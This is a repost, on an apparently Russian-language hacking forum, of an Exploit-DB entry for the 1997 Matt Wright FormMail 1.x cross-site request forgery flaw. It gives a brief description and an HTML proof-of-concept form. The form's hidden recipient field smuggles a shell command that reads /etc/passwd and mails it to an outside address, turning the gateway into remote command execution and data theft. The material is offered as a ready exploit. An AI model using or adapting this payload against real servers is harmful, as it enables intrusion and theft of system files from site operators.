Exploit Matt Wright FormMail 1.x - Cross-Site Request Forgery

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20486
Проверка EDB
  1. Пройдено
Автор
ANONYMOUS
Тип уязвимости
REMOTE
Платформа
UNIX
CVE
cve-1999-0173
Дата публикации
1997-01-01
HTML:
source: https://www.securityfocus.com/bid/2080/info

FormMail is a widely-used web-based e-mail gateway, which allows form-based input to be emailed to a specified user.

A web server can use a remote site's FormMail script without authorization, using remote system resources or exploiting other vulnerabilities in the script. For example, this issue can be used to exploit BID 2079, "Matt Wright FormMail Remote Command Execution Vulnerability". 

<html><head><title>hack</title></head>
<body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="[email protected]; cat /etc/passwd | mail [email protected]">
<input type="submit" name="submit" value="submit">
</form></body></html>
 
Источник
www.exploit-db.com

Похожие темы